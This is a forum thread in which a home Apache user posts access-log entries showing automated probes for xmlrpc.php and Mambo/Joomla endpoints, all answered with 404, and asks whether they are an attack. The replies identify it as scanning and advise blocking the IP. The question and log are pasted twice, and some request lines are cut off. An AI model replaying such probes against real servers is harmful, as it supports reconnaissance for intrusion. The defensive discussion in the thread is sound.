My WebServer Logs - Is this an attack?
Hi, I found wome weird entries on my webserver access logs. My webserver could only have been found by port scanning - it is running on my home PC and I use dynamic dns to locate it. It is basically just used by friends and family in other states to view pictures of my new baby son.
I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.
NOTE: All of the resources being requested do not exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested. It looks to me like someone is fishing around for some known vulnerabilities (and not finding any I hope).
I'd appreciate any advice on what you think the logs indicate... Is this an attack or something innocent?
I'm running apache2.
218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_con
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_cont
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST
I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.
NOTE: All of the resources being requested do not exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested. It looks to me like someone is fishing around for some known vulnerabilities (and not finding any I hope).
I'd appreciate any advice on what you think the logs indicate... Is this an attack or something innocent?
I'm running apache2.
218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_con
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_cont
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
It's not a problem, however. Note that all the responses are "404". That means what was sought was not found. If this were my server I'd simply put a block on this IP address to prevent further attempts. You could try reporting this to the ISP that handles this IP but in most cases such requests get ignored.
ASKER
Thanks for the response - the link to isc.sans.org from jss is very informative. Thanks also to jhance - I had not noticed the responses were all 404 - that's a relief. I will indeed block this IP - good idea.
I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.
Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.
Either way, I intend to contact this website and ask the to PLEASE EXPLAIN. I will also write to the ISP. It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought. Perhaps they think it makes them some sort of "l33t hacker" or something equally as silly, but they are just scriptkiddies, following the steps that someone else worked out for them. I'm upset, but I'll stop raving now.
I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.
Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.
Either way, I intend to contact this website and ask the to PLEASE EXPLAIN. I will also write to the ISP. It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought. Perhaps they think it makes them some sort of "l33t hacker" or something equally as silly, but they are just scriptkiddies, following the steps that someone else worked out for them. I'm upset, but I'll stop raving now.